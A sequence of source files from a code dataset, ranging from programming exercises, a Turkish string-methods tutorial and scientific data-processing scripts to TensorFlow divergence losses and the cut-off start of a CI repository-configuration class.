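vsb = tk.Scrollbar(root, orient="vertical", command=canvas.yview)
canvas.configure(yscrollcommand=vsb.set)
vsb.pack(side="right", fill="y")
canvas.pack(side="left", fill="both", expand=True)
canvas.create_window((0, 0), window=inner, anchor="nw")
# grow the scrollable area whenever the inner frame is resized
inner.bind("<Configure>",
           lambda e: canvas.configure(scrollregion=canvas.bbox("all")))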
rasterio.open('/Users/zzz/exp/jrc/sqkm/GHS_BUILT_LDS2014_GLOBE_R2016A_54009_1k_v1_0/GHS_BUILT_LDS2014_GLOBE_R2016A_54009_1k_v1_0_3857.tif') as src:\n \n for index, row in data.iterrows():\n centre_x = (row['left']+row['right'])/2\n centre_y = (row['top']+row['bottom'])/2\n # print(centre_x, centre_y)\n vals = src.sample([(centre_x, centre_y)])\n for val in vals:\n # print(val)\n sales.append({'left': row['left'], 'top': row['top'], 'right': row['right'], 'bottom': row['bottom'], 'id': row['id'], 'dn': val[0]})\n\ndf = pd.DataFrame(sales)\n\nprint(df)\n\ndf.to_csv (r'/Users/zzz/exp/jrc/sqkm/bruned/raster_mos.csv', index = None, header=True) #Don't forget to add '.csv' at the end of the path\n","repo_name":"GIScience/socialmedia2traffic-webmap-server","sub_path":"miss/scripts/raster_get_dn_at_xy.py","file_name":"raster_get_dn_at_xy.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25058709975","text":"def solution(sticker):\n N = len(sticker)\n table1 = [0]*N\n table2 = [0]*N\n\n table1[0] = sticker[0]\n \n\n ## 첫 스티커 선택\n for i in range (1,N-1):\n table1[i] = max(table1[i-2]+sticker[i],table1[i-1])\n print(table1)\n\n for i in range (1,N):\n table2[i] = max(table2[i-2]+sticker[i],table2[i-1])\n print(table2)\n\n return max(table1[-2],table2[-1])\n\n\n\n\nQ1 = [14, 6, 5, 11, 3, 9, 2, 10] # 36\nQ2 = [1, 3, 2, 5, 4] # 8\nQ3 = [1]\n\nsolution(Q3)\n","repo_name":"aver1001/github-practice","sub_path":"programmers/Level 3/스티커 모으기 (2)/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33754315208","text":"def move_zeros(array):\n #your code here\n new_array = [] \n \n new_index = 0\n while len(array) > 0:\n item = array.pop(0)\n if item == 0 and type(item) == int:\n new_array.append(item)\n else:\n new_array.insert(new_index, item)\n new_index = new_index + 1\n return new_array\n\n \n\nprint(move_zeros([1,2,0,1,0,1,0,3,0,1]))\nprint(move_zeros([9,0.0,0,9,1,2,0,1,0,1,0.0,3,0,1,9,0,0,0,0,9]))\n\nprint( False == 0 )","repo_name":"code-knayam/DataStructureAlgorithms","sub_path":"code-wars/002.move_zeros_to_end.py","file_name":"002.move_zeros_to_end.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26089152135","text":"class Solution:\n def minDeletionSize(self, strs: List[str]) -> int:\n \n unsorted = 0\n n = len(strs[0])\n for i in range(n):\n # char = strs[0][i]\n ith_list = []\n for ch in strs:\n ith_list.append(ch[i])\n if sorted(ith_list) != ith_list:\n unsorted += 1\n return unsorted","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0944-delete-columns-to-make-sorted/0944-delete-columns-to-make-sorted.py","file_name":"0944-delete-columns-to-make-sorted.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13123075126","text":"import sys\nimport collections\nfrom collections import defaultdict\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\nclass stats:\n\n\n\tvlist = None #Tuple list of all V sequence types and their quality\n\tjlist = None #Typle list of all J sequence types and their quality\n\tdlist = None #Tuple list of all D sequence types and their 
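The solution() function above is the circular variant of the maximum-sum-of-non-adjacent-elements problem: because the first and last stickers are neighbours, it solves the line case twice, once without the last element (table1) and once without the first (table2). The same idea in constant space (a sketch; the helper names are mine), checked against the expected answers noted in the source:

def rob_line(values):
    take = skip = 0
    for v in values:
        # either extend with v (previous element skipped) or skip v
        take, skip = skip + v, max(take, skip)
    return max(take, skip)

def max_stickers(sticker):
    if len(sticker) == 1:
        return sticker[0]
    return max(rob_line(sticker[:-1]), rob_line(sticker[1:]))

assert max_stickers([14, 6, 5, 11, 3, 9, 2, 10]) == 36
assert max_stickers([1, 3, 2, 5, 4]) == 8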
quality\n\n\tvgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\tjgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\tdgenes = defaultdict() #Ordered Dict of all vgene types and their count\n\n\n\t#import and parse the file this class will use around\n\tdef __init__(self, filename):\n\n\t\tprint(\"\\n************************************************************\")\n\t\tprint(\"************READING AND CLEANING ANNOTATION DATA************\")\n\t\tprint(\"***************...this may take a second...*****************\\n\")\n\t\tdf = pd.read_csv(filename, sep='\\t')\n\t\tself.vlist = df.allVHitsWithScore.tolist()\n\t\tself.jlist = df.allJHitsWithScore.tolist()\n\t\tself.dlist = df.allDHitsWithScore.tolist()\n\t\t\n\t\tself.cleanData(self.vlist)\n\t\tself.cleanData(self.jlist)\n\t\tself.cleanData(self.dlist)\n\t\tprint(\"done!\")\n\n\t#Returns dict {chain-name, chain-count}\n\tdef geneCount(self, datalist):\n\t\ttally = defaultdict()\n\t\tfor gene, quality in datalist:\n\t\t\tif len(gene)>0:\n\t\t\t\tif gene in tally:\n\t\t\t\t\ttally[gene] += 1\n\t\t\t\telse:\n\t\t\t\t\ttally.update({gene:1})\n\t\treturn OrderedDict(sorted(tally.items(),key=lambda t: t[0]))\n\n\n\t#Get read element chain type\n\tdef getChain(self, data):\n\t\ti = data.find(\"*\")\n\t\tif i == -1:\n\t\t\treturn None\n\t\treturn data[:i]\n\n\n\t#Get read element quality\n\tdef getQuality(self, data):\n\t\ti = data.find(\"(\")\n\t\tif i == -1:\n\t\t\treturn None\n\t\tj = data.find(\")\")\n\t\treturn int(data[i+1:j])\n\n\n\t#Sorts and determines which chain elements need to be sorted and \n\tdef cleanData(self, datalist):\n\t\tfor i in range(0,len(datalist)):\n\t\t\t#Selects the best of the reads\n\t\t\tdatalist[i] = str(datalist[i])\n\t\t\tif(datalist[i] and datalist[i].find(\",\") != -1):\n\t\t\t\tdatalist[i] = self.getBestChain(datalist[i])\n\n\t\t\t#Creates tuple list object\n\t\t\tif(datalist[i].find(\"IGH\") != -1 and datalist[i].find(\"*\") != -1):\n\t\t\t\tdatalist[i] = [self.getChain(datalist[i]), self.getQuality(datalist[i])]\n\n\t\t\telse: #For the occasional \"nan\" value\n\t\t\t\tdatalist[i] = [\"\", 0]\n\n\n\t#returns the best quality read from the list element given\n\tdef getBestChain(self, data):\n\t\tchains = [x.strip() for x in data.split(',')] #splice data by commas, leaves individual reads and their quality\n\t\tindex = 1 #Compare any other chain qualities\n\t\tbest = self.getQuality(chains[0])\n\t\tfor x in chains[1:]:\n\t\t\tif self.getQuality(x) == best:\n\t\t\t\tindex += 1\n\n\t\treturn chains[random.randrange(0,index)]\n\n\t#Read usage bar plot from single list (v, d, j)\n\tdef barPlot(self, datalist, threshold, figname):\n\n\t\ttally = self.geneCount(datalist)\n\n\t\t#Limit the items plotted to those over 1% of the read mass\n\t\tgeneplot = defaultdict()\n\t\tfor g, n in tally.iteritems():\n\t\t\tif n > int(sum(tally.values())*threshold):\n\t\t\t\tgeneplot[g] = n\n\n\t\t#Get plotting values\n\t\tolist = OrderedDict(sorted(geneplot.items(),key=lambda t: t[0]))\n\t\tsumme = sum(olist.values())\n\t\tfreq = [float(x)/float(summe) for x in olist.values()]\n\t\t\n\t\t#Create plot\n\t\tfig = plt.figure()\n\t\twidth = .35\n\t\tind = np.arange(len(geneplot.keys()))\n\t\tplt.bar(ind, freq)\n\t\tplt.xticks(ind + width, geneplot.keys())\n\t\tlocs, labels = plt.xticks() \n\t\tplt.setp(labels, rotation=90)\n\t\tplt.show()\n\n\t\tfig.savefig(figname)\n\t\tprint(\"Saved bar plot as: \"+figname)\n\n\tdef Vgene_usage(self, 
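geneCount above is a hand-rolled tally over (gene, quality) pairs; the standard-library equivalent is collections.Counter, which also exposes most_common for sorting by frequency. An alternative sketch, not a change to the class:

from collections import Counter

def gene_count(datalist):
    # datalist holds (gene, quality) pairs; empty gene names are skipped
    return Counter(gene for gene, quality in datalist if gene)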
**keyargs):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING V GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Vgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.vlist, th, name)\n\n\tdef Jgene_usage(self):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING J GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Jgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.jlist)\n\n\tdef Dgene_usage(self):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING D GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Dgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.dlist)\n\n\t#Creates a heatmap graph of the V and J gene pairings\n\tdef V_J_heatmap(self, **keyargs):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING V/J GENE HEATMAP******************\")\n\t\tprint(\"************************************************************\\n\")\n\t\t\n\t\t#Getting which reads to check for\t\t\n\t\tvcount = self.geneCount(self.vlist)\n\t\tjcount = self.geneCount(self.jlist)\n\t\tvjlist = []\n\n\t\t#Checking for a threshold to clean data\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\t\tif(th >= 0 and th < 1):\n\t\t\t\tfor key, val in vcount.iteritems():\n\t\t\t\t\tif val <= int(sum(vcount.values())*th):\n\t\t\t\t\t\tdel vcount[key]\n\n\t\t\t\tfor key, val in jcount.iteritems():\n\t\t\t\t\tif val <= int(sum(jcount.values())*th):\n\t\t\t\t\t\tdel jcount[key]\n\n\n\t\tfor x in range(len(vcount)):\n\t\t\tvjlist.append([])\n\t\t\tfor y in range(len(jcount)):\n\t\t\t\tvjlist[x].append(0)\n\n\t\t#2D dict for storing gene hits\n\t\t#jaxis = {key:0 for key, val in jcount.iteritems()}\n\t\t#vjlist = {key: jaxis.copy() for key, val in vcount.iteritems()}\n\n\t\t#Checking for read hits in v and j list\n\t\tfor x in range(len(self.vlist)):\n\t\t\tvgene = self.vlist[x][0]\n\t\t\tjgene = self.jlist[x][0]\n\t\t\tif vgene in vcount.keys() and jgene in jcount.keys():\n\t\t\t\tvi = vcount.keys().index(vgene)\n\t\t\t\tji = jcount.keys().index(jgene)\n\t\t\telse:\n\t\t\t\tvi = -1\n\t\t\t\tji = -1\n\t\t\tif vgene != '' and jgene != '' and vi > -1 and ji >-1:\n\t\t\t\tvjlist[vi][ji] += 1\n\n\t\t#Make each number a percent of total reads in the v/j array\n\t\treadsum = sum(map(sum, vjlist))\n\t\tfor x in range(len(vcount)):\n\t\t\tfor y in range(len(jcount)):\n\t\t\t\tvjlist[x][y] = float(vjlist[x][y])/float(readsum)\n\t\t\n\t\tfig = plt.figure()\n\t\tplt.imshow(vjlist, interpolation='none', aspect=1/1, vmin=0, vmax=1)\n\t\tplt.yticks(range(len(vcount)), vcount.keys()) #some error about self._edgecolors == 'face'?\n\t\tplt.xticks(range(len(jcount)), 
jcount.keys())\n\t\tplt.jet()\n\t\tplt.colorbar()\n\t\tplt.show()\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_VJ_heatmap.png\"\n\t\t\tfig.savefig(keyargs['figname']+\"_VJ_heatmap.png\")\n\t\t\tprint('Saved heatmap plot as: '+name)\n\t\telse:\n\t\t\tfig.savefig(\"VJ_heatmap.png\")\n\t\t\tprint('Saved heatmap plot as: VJ_heatmap.png')","repo_name":"cnellington/BIGGDATA-Stats-Modules","sub_path":"annotationstats.py","file_name":"annotationstats.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11249933921","text":"website = \"http://www.sadikturan.com\"\ncourse = \"Python Kursu: Baştan Sona Python Programlama Rehberiniz (40 Saat)\"\n\n\n# 1 - ' Hello World ' karakter dizisinin baştaki ve sondaki boşluk karakterlerini silin.\n\nresult = ' Hello World '.strip()\nresult = ' Hello World '.lstrip()\nresult = ' Hello World '.rstrip()\n\n# ya da website ifadesinin başındaki karakterleri silelim www'den başlasın ve bize sadece www.sadikturan.com versin;\n\nresult = website.lstrip('/:pth')\n\n# 2 - 'www.sadikturan.com' dizinindeki sadikturan bilgisi dışındaki her karakteri silin.\n\nresult = 'www.sadikturan.com'.strip('w.moc')\n\n# 3 - 'course' karakter dizisinin tüm karakterlerini küçük harf yapın.\n\nresult = course.lower()\nresult = course.upper()\nresult = course.title()\n\n# 4 - 'website' dizininde kaç tane a karakteri vardır (count('a'))\n\nresult = website.count('a')\nresult = website.count('www')\nresult = website.count('www',0,10)\n\n# 5 - 'website' dizini www ile başlayıp com ile bitiyor mu?\n\nresult = website.startswith('www')\nresult = website.startswith('http')\nresult = website.endswith('com')\n\n# 6 - 'website' dizini içerisinde '.com' ifadesi var mı?\n\nresult = website.find('com')\nresult = website.find('com',0,10)\nresult = course.find('Python')\nresult = course.rfind('Python')\n\nresult = website.index('com') \nresult = website.rindex('com')\n# result = website.rindex('comm') # exception\n\n# 7 - 'course' dizini içerisindeki tüm karakterler alfabetik mi? 
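The nested hit-counting loops in V_J_heatmap above can be collapsed with pandas, which the module already imports: crosstab builds the same V-by-J co-occurrence matrix, and normalize='all' reproduces the division by the total read count. An equivalent sketch, not part of the class:

import pandas as pd

def vj_matrix(vlist, jlist):
    pairs = pd.DataFrame({"V": [v for v, q in vlist],
                          "J": [j for j, q in jlist]})
    pairs = pairs[(pairs.V != "") & (pairs.J != "")]
    return pd.crosstab(pairs.V, pairs.J, normalize="all")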
(isalpha, isdigit)\n\nresult = course.isalpha()\nresult = 'Hello'.isalpha()\nresult = course.isdigit()\nresult = '123'.isdigit()\n\n# 8 - 'Contents' ifadesini satırda 50 karakter içerisine yerleştirip sağına soluna * ekleyiniz.\n\nresult = 'Contents'.center(50)\nresult = 'Contents'.center(50, '*')\nresult = 'Contents'.ljust(50, '*')\nresult = 'Contents'.rjust(50, '*')\n\n# 9 - 'course' karakter dizisindeki tüm boşluk karakterlerini '-' ile değiştiriniz.\n\nresult = course.replace(' ', '-')\nresult = course.replace(' ', '-',5)\nresult = course.replace(' ', '')\n\n# 10 - 'Hello World' karakter dizisinin 'World' ifadesini 'There' ile değiştiriniz.\n\nresult = 'Hello World'.replace('World', 'There')\n\n# 11 - 'course' karakter dizisini boşluk karakterlerinden ayırın.\n\nresult = course.split(' ')\n# result = result[2]\nresult = result[5]\n\n\nprint(result)\n\n\n","repo_name":"code-tamer/Library","sub_path":"Business/KARIYER/PYTHON/Python_Temelleri/string-methods-demo.py","file_name":"string-methods-demo.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34509981998","text":"import tensorflow as tf\nimport numpy as np\n\n#@tf.function\ndef f_star(g, loss_par): # f^*(g) = inf_x -f(x)\n threshold = 0.01\n if loss_par['f'] == 'KL': # f = xlogx -x +1\n return tf.math.exp(g)-1\n elif loss_par['f'] == 'alpha':\n alpha = loss_par['par'][0] # f = (x^alpha-1)/(alpha*(alpha-1))\n return 1/alpha*(1/(alpha-1)+tf.math.pow((alpha-1)*tf.nn.relu(g), alpha/(alpha-1)))\n elif loss_par['f'] == 'reverse_KL': # f = -logx\n max_g = tf.math.reduce_max(g)\n if max_g > threshold: # numerical stability\n return -1 - tf.math.log(-g+threshold)\n else:\n return -1 - tf.math.log(-g)\n elif loss_par['f'] == 'JS': # Jensen-Shannon\n max_exp_g = tf.math.reduce_max(tf.math.exp(g))\n if max_exp_g > 2.0-threshold: # numerical stability\n return -tf.math.log( 2 - tf.math.exp(g) + threshold )\n else:\n return -tf.math.log( 2 - tf.math.exp(g) )\n \n\n# --------------------------\n\ndef E_phi(x, x_label, N_x, mb_size_x, phi, W, b, NN_par):\n g1 = []\n if NN_par['N_conditions'] > 1: # indexing for x_label\n for n in range(int(N_x/mb_size_x)):\n g1.append(tf.math.reduce_sum(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)))\n if int(N_x/mb_size_x) * mb_size_x < N_x:\n g1.append( tf.reduce_sum(phi(x[int(N_x/mb_size_x):],x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)) )\n \n else: # not indexing for x_label=None\n for n in range(int(N_x/mb_size_x)):\n g1.append(tf.math.reduce_sum(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label, W,b, NN_par)))\n if int(N_x/mb_size_x) * mb_size_x < N_x:\n g1.append( tf.reduce_sum(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par)) )\n \n return tf.add_n(g1)/N_x\n\n \ndef E_fstar_phi(x, x_label, N_x, mb_size_x, phi, nu, W, b, NN_par, loss_par):\n g2 = []\n if NN_par['N_conditions'] > 1: # indexing for x_label\n for n in range(int(N_x/mb_size_x)):\n if loss_par['formulation'] == 'DV':\n g2.append(tf.math.reduce_sum(tf.math.exp(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par))))\n else: # LT\n g2.append(tf.math.reduce_sum(f_star(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)-nu, loss_par)))\n \n if int(N_x/mb_size_x) * mb_size_x < N_x:\n if loss_par['formulation'] == 'DV':\n g2.append( tf.reduce_sum(tf.math.exp(phi(x[int(N_x/mb_size_x):],x_label[int(N_x/mb_size_x):], W,b, NN_par))) )\n else: # 
LT\n g2.append( tf.reduce_sum(f_star(phi(x[int(N_x/mb_size_x):],x_label[int(N_x/mb_size_x):], W,b, NN_par)-nu, loss_par)) )\n\n else: # don't do indexing for x_label=None\n for n in range(int(N_x/mb_size_x)):\n if loss_par['formulation'] == 'DV':\n g2.append(tf.reduce_sum(tf.math.exp(phi(x[n*mb_size_x:(n+1)*mb_size_x],x_label, W,b, NN_par))))\n else: # LT\n g2.append(tf.reduce_sum(f_star(phi(x[n*mb_size_x:(n+1)*mb_size_x],x_label, W,b, NN_par)-nu, loss_par)))\n \n if int(N_x/mb_size_x) * mb_size_x < N_x:\n if loss_par['formulation'] == 'DV':\n g2.append( tf.reduce_sum(tf.math.exp(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par))) )\n else: # LT\n g2.append( tf.reduce_sum(f_star(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par)-nu, loss_par)) )\n \n return tf.add_n(g2)/N_x\n\n\ndef divergence_mb(phi, nu, P, Q, W, b, NN_par, loss_par, data_par):\n N_P, N_Q, mb_size_P, mb_size_Q = data_par['N_samples_P'], data_par['N_samples_Q'], data_par['mb_size_P'], data_par['mb_size_Q']\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n \n\n if loss_par['reverse'] == False: # D(P||Q)\n g1 = E_phi(P, P_label, N_P, mb_size_P, phi, W, b, NN_par)\n g2 = E_fstar_phi(Q, Q_label, N_Q, mb_size_Q, phi, nu, W, b, NN_par, loss_par)\n else: # D(Q||P)\n g1 = E_phi(Q, Q_label, N_Q, mb_size_Q, phi, W, b, NN_par)\n g2 = E_fstar_phi(P, P_label, N_P, mb_size_P, phi, nu, W, b, NN_par, loss_par)\n \n \n if loss_par['formulation'] == 'DV':\n return g1 - tf.math.log(g2)\n else:\n return g1 - g2 - nu\n \n \ndef wasserstein1_mb(phi, P, Q, W, b, NN_par, data_par):\n N_P, N_Q, mb_size_P, mb_size_Q = data_par['N_samples_P'], data_par['N_samples_Q'], data_par['mb_size_P'], data_par['mb_size_Q']\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n \n g1 = E_phi(P, P_label, N_P, mb_size_P, phi, W, b, NN_par)\n g2 = E_phi(Q, Q_label, N_Q, mb_size_Q, phi, W, b, NN_par)\n \n return g1 - g2\n \n\n\ndef calc_grad_phi(dP_dt):\n return np.mean(np.linalg.norm(dP_dt, axis=1))\n\n\n# @tf.function : might not be compatible to soft lipschitz constraint loss\ndef gradient_penalty(phi, P, Q, W, b, NN_par, data_par, lamda):\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n if NN_par['constraint'] == 'soft':\n L = NN_par['L']\n \n '''\n N_tot = min((200, P.shape[0], Q.shape[0]))\n N_P = int(N_tot*P.shape[0]/(P.shape[0]+Q.shape[0]))\n N_Q = int(N_tot*Q.shape[0]/(P.shape[0]+Q.shape[0]))\n r_P = np.random.randint(int(P.shape[0]/N_P))\n r_Q = np.random.randint(int(Q.shape[0]/N_Q))\n R = tf.concat([P[r_P*N_P:(r_P+1)*N_P], Q[r_Q*N_Q:(r_Q+1)*N_Q]], axis=0)\n \n if P_label != None:\n R_label = tf.concat([P_label[r_P*N_P:(r_P+1)*N_P], Q_label[r_Q*N_Q:(r_Q+1)*N_Q]], axis=0)\n else:\n R_label = None\n '''\n \n R = P\n R_label = P_label\n \n \n with tf.GradientTape(watch_accessed_variables=False) as tape:\n tape.watch(R)\n phi_R = phi(R,R_label, W,b,NN_par)\n dR = tape.gradient(phi_R, R)\n \n grad_phi = calc_grad_phi(dR)\n \n \n \n return tf.multiply(-lamda, tf.math.reduce_mean(tf.nn.relu(tf.math.square(dR/L)-1.0)))\n else:\n return tf.constant(0.0, dtype=tf.float32)\n\n","repo_name":"HyeminGu/Lipschitz_regularized_generative_particles_algorithm","sub_path":"scripts/GPA_NN/lib/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34762180199","text":"# python peptideGroupsCombine.py L:/promec/Animesh/Maria/peptides/peptides\n#wget 
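f_star above implements the convex conjugate f*(g) = sup_x { g*x - f(x) } for each divergence choice. For the KL branch, f(x) = x*log(x) - x + 1 gives f'(x) = log(x), so the supremum is attained at x = e^g and f*(g) = g*e^g - (g*e^g - e^g + 1) = e^g - 1, matching the code. A quick numerical check of that identity by grid search, independent of TensorFlow:

import numpy as np

g = 0.7
xs = np.linspace(1e-6, 50.0, 2_000_000)
f = xs * np.log(xs) - xs + 1.0
conjugate = (g * xs - f).max()  # sup_x g*x - f(x), approximated on a grid
assert abs(conjugate - (np.exp(g) - 1.0)) < 1e-3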
https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\n#..\\python-3.11.0\\python.exe -m pip install pandas seaborn\n#..\\python-3.11.0\\python.exe peptideGroupsCombine.py ..\\..\\Aida\\sORF\\mqpar.K8R10.xml.1664621075.results\n# where peptides folder contains all experiments generated like like following:\n# tar cvzf pep.tgz mqpar.xml.1642586*/*/combined/txt/peptides.txt\n# mkdir peptides\n# cd peptides\n# tar xvzf ../pep.tgz\n#!pip3 install pandas pathlib --user\nimport pandas as pd\nimport sys\nfrom pathlib import Path\nif len(sys.argv) != 2:\n sys.exit(\"\\n\\nREQUIRED: pandas, pathlib; tested with Python 3.9.9 \\n\\nUSAGE: python peptideGroupsCombine.py \\n\\nExample\\n\\npython proteinGroupsCombineTTP.py L:\\promec\\Animesh\\Maria\\mqpar.xml.1623227664.results\")\npathFiles = Path(sys.argv[1])\n#pathFiles=Path(\"L:/OneDrive - NTNU/Aida/sORF/mqpar.K8R10.xml.1664621075.results/\")\nfileName = 'peptides.txt'\ntrainList = list(pathFiles.rglob(fileName))\n#trainList=[fN for fN in trainList if \"MGUS\" in str(fN)]\n#df = pd.concat(map(pd.read_table, trainList))\n# df.to_csv(pathFiles.with_suffix('.combinedT.txt'),sep=\"\\t\")#,rownames=FALSE)\n# f=trainList[0]\ndf = pd.DataFrame()\nfor f in trainList:\n if Path(f).stat().st_size > 0:\n peptideHits = pd.read_csv(f, low_memory=False, sep='\\t')\n print(f.parts)\n peptideHits.rename({'Ratio H/L normalized':'normH2L'},inplace=True,axis='columns')\n peptideHits=peptideHits[~peptideHits['Proteins'].str.contains(\"_HUMAN\",na=False)]\n peptideHits=peptideHits.assign(IDs=peptideHits['Leading razor protein'].str.split(';')).explode('IDs')\n peptideHits['pepID'] = peptideHits['Sequence']+';'+peptideHits['IDs']\n peptideHits['Name'] = f.parts[-4]\n df = pd.concat([df, peptideHits], sort=False)\nprint(df.columns)\nprint(df.head())\ndf = df.pivot_table(index='pepID', columns='Name',values='normH2L') # , aggfunc='median')\n# dfO=df\n# df.to_csv(pathFiles.with_suffix('.combined.txt'),sep=\"\\\")#,rownames=FALSE)\nplotcsv = pathFiles/(fileName+\".normH2L.histogram.svg\")\ndf.plot(kind='hist', alpha=0.5, bins=100).figure.savefig(plotcsv, dpi=100, bbox_inches=\"tight\")\ndf['Count'] = df.count(axis=1)\nprint(df.Count)\ndf = df.sort_values('Count', ascending=False)\nwriteScores = pathFiles/(fileName+\".Count.normH2L.csv\")\ndf.to_csv(writeScores) # .with_suffix('.combo.csv'))\nprint(\"Count Score in\\n\", writeScores, \"\\n\", plotcsv)\n#df.iloc[:, 0:1].plot(kind='hist')\n# writeDPpng=pathFiles/(fileName+\"Score.png\")\n#df.plot(kind='hist').figure.savefig(writeDPpng.absolute(),dpi=100,bbox_inches = \"tight\")\n#print(\"Histogram of Score in\",writeDPpng)\n# selecting for phosphorylated-peptides\n#df=df.filter(regex='79', axis=\"index\")\nimport numpy as np\nlog2df=-np.log2(df)\nprint(log2df.head())\nprint(log2df.columns)\nplotcsv = pathFiles/(fileName+\".log2normL2H.histogram.svg\")\nlog2df.plot(kind='hist', alpha=0.5, bins=100).figure.savefig(plotcsv, dpi=100, bbox_inches=\"tight\")\nwriteScores = pathFiles/(fileName+\".log2Count.normL2H.csv\")\nlog2df.to_csv(writeScores) # .with_suffix('.combo.csv'))\nprint(\"Count Score in\\n\", writeScores, \"\\n\", plotcsv)\n","repo_name":"animesh/scripts","sub_path":"peptideGroupsCombine.py","file_name":"peptideGroupsCombine.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10772781785","text":"import collections\nfrom golem import ConfigParser\nfrom copy import copy\nimport datetime\nimport 
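The pivot_table call in the script above is what turns the long per-file peptide table into a wide matrix: one row per Sequence;protein pair, one column per MaxQuant run, with the normalized H/L ratio as the cell value. A toy illustration of that reshape (made-up values):

import pandas as pd

toy = pd.DataFrame({"pepID": ["PEPTIDEK;A", "PEPTIDEK;A", "SEQK;B"],
                    "Name": ["run1", "run2", "run1"],
                    "normH2L": [0.5, 0.8, 1.2]})
wide = toy.pivot_table(index="pepID", columns="Name", values="normH2L")
assert wide.loc["PEPTIDEK;A", "run2"] == 0.8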
fnmatch\nimport getpass\nimport github3\nfrom golem import GolemError, OutputLogger, RunLogger, now\nimport hashlib\nimport json\nimport keyword\nimport logging\nimport os\nimport re\nimport requests\nimport shlex\nimport shutil\nimport socket\nimport traceback\nimport whelk\nimport golem.db\nimport sqlalchemy.sql as sql\n\nclass IniConfig(object):\n defaults = {}\n def __init__(self, config, section):\n if not hasattr(self, 'config'):\n self.config = {}\n for key in self.defaults:\n self._set(key, copy(self.defaults[key]))\n for key in config.options(section):\n self._set(key, config.get(section, key), config=True)\n\n def _set(self, key, val, config=False):\n if isinstance(val, basestring):\n if \"\\n\" in val:\n val = [shlex.split(x) for x in val.split(\"\\n\")]\n else:\n val = shlex.split(val)\n if len(val) == 1:\n val = val[0]\n if '.' in key:\n key1, key2 = key.split('.', 1)\n if keyword.iskeyword(key1):\n key1 += '_'\n if not hasattr(self, key1):\n setattr(self, key1, {})\n getattr(self, key1)[key2] = val\n if config:\n if key1 not in self.config:\n self.config[key1] = {}\n self.config[key1][key2] = val\n else:\n if keyword.iskeyword(key):\n key += '_'\n setattr(self, key, val)\n if config:\n self.config[key] = val\n\nclass Repository(IniConfig):\n defaults = {'upstream': None, 'reflogtype': None, 'actions': {}, 'notifiers': {}, 'remote': {}}\n def __init__(self, daemon, config, db):\n self.configfile = config\n self.mtime = os.path.getmtime(config)\n config = ConfigParser(config)\n IniConfig.__init__(self, config, 'repo')\n self.logger = logging.getLogger('golem.repo.' + self.name)\n self.logger.info(\"Parsing configuration for %s\" % self.name)\n self.path = os.path.join(daemon.repo_dir, self.name)\n self.repo_path = os.path.join(self.path, self.name + '.git')\n self.artefact_path = os.path.join(self.path, 'artefacts')\n self.shell = whelk.Shell(output_callback=OutputLogger(self.logger), run_callback=RunLogger(self.logger), cwd=self.repo_path)\n\n if hasattr(self, 'reflog_url'):\n self.reflogtype = 'http'\n self.reflogurl = self.reflog_url\n elif re.match('^https?://', self.upstream):\n 